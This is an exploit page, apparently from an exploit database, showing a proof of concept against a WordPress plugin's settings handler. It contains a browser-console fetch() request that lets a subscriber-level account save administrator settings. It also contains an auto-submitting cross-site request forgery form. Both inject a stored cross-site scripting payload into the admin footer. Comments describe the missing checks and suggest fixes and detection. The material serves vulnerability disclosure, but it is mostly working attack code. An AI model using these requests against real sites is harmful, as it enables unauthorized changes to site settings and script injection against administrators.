## https://sploitus.com/exploit?id=WPEX-ID:46996537-A874-4B2E-9CD7-7D0832F9704D
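Run the command below in the web browser's developer console while logged in to the blog as a subscriber user. The request carries a placeholder nonce (`aaa`) and an `alert(1)` marker in `wfb_admin_footer_text`, so an accepted save indicates that the settings handler does not restrict writes to administrators.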

// Posts the plugin's settings form fields to /wp-admin/ from the current browser
// session; "credentials": "include" attaches that session's cookies, which on
// this page belong to a subscriber account.
// The wpbiz-nonce field carries the placeholder "aaa", and wfb_admin_footer_text
// carries an <img onerror=alert(1)> marker. If the value is stored and later
// rendered in the admin footer, the handler presumably skips nonce verification,
// a capability check and output escaping. NOTE(review): confirm against the
// plugin source; the handler itself is not shown here.
// Fix on the plugin side: verify the nonce (check_admin_referer / wp_verify_nonce)
// and require current_user_can('manage_options') before saving, sanitize the
// footer text on save (e.g. wp_kses_post) and escape it on output (e.g. esc_html).
// Detection: POST requests to /wp-admin/ containing tabid=total-hacks-admin that
// originate from accounts without administrator rights.
await fetch("/wp-admin/", {
    "credentials": "include",
    "body": "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=<img src=x onerror=alert(1)>&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern",
    "method": "POST",
    "mode": "cors"
});


<!--
  Cross-site form variant of the settings request: the form posts the plugin's
  settings fields to /wp-admin/ on the target blog (example.com is a placeholder
  host) and can be served from a different origin.
  wpbiz-nonce is the placeholder "aaa", so the request only succeeds if the
  handler does not validate the nonce. NOTE(review): presumably the handler also
  lacks a capability check; confirm against the plugin source.
  wfb_admin_footer_text holds an img/onerror alert(1) marker; wfb_google_analytics
  and wfb_google hold filler strings; every other field is empty.
  Whether the visitor's session cookies accompany a cross-site POST depends on the
  SameSite attribute of the site's cookies.
  Fix on the plugin side: reject the save unless check_admin_referer succeeds and
  current_user_can('manage_options') is true, and escape the footer text on output.
-->
<form id="test" action="https://example.com/wp-admin/" method="post">
  <input type="text" name="wpbiz-nonce" value="aaa">
  <input type="text" name="tabid" value="total-hacks-admin">
  <input type="text" name="wfb_favicon" value="">
  <input type="text" name="wfb_admin_favicon" value="">
  <input type="text" name="wfb_apple_icon" value="">
  <input type="text" name="wfb_remove_xmlrpc" value="">
  <input type="text" name="wfb_hide_version" value="">
  <input type="text" name="wfb_remove_more" value="">
  <input type="text" name="wfb_remove_excerpt" value="">
  <input type="text" name="wfb_disallow_pingback" value="">
  <input type="text" name="wfb_google_analytics" value="wwwww">
  <input type="text" name="wfb_google" value="ttttt">
  <input type="text" name="wfb_bing" value="">
  <input type="text" name="wfb_revision" value="">
  <input type="text" name="wfb_selfping" value="">
  <input type="text" name="wfb_pageexcerpt" value="">
  <input type="text" name="wfb_createpagefordraft" value="">
  <input type="text" name="wfb_custom_logo" value="">
  <input type="text" name="wfb_admin_footer_text" value="<img src=x onerror=alert(1)>">
  <input type="text" name="wfb_login_logo" value="">
  <input type="text" name="wfb_login_url" value="">
  <input type="text" name="wfb_login_title" value="">
  <input type="text" name="wfb_shortcode" value="">
  <input type="text" name="wfb_oembed" value="">
  <input type="text" name="wfb_webmaster" value="">
  <input type="text" name="wfb_sendername" value="">
  <input type="text" name="wfb_emailaddress" value="">
  <input type="text" name="wfb_update_notification" value="">
</form>
<script>
    // Submits the form as soon as this script runs, without any user interaction.
    document.getElementById("test").submit();
</script>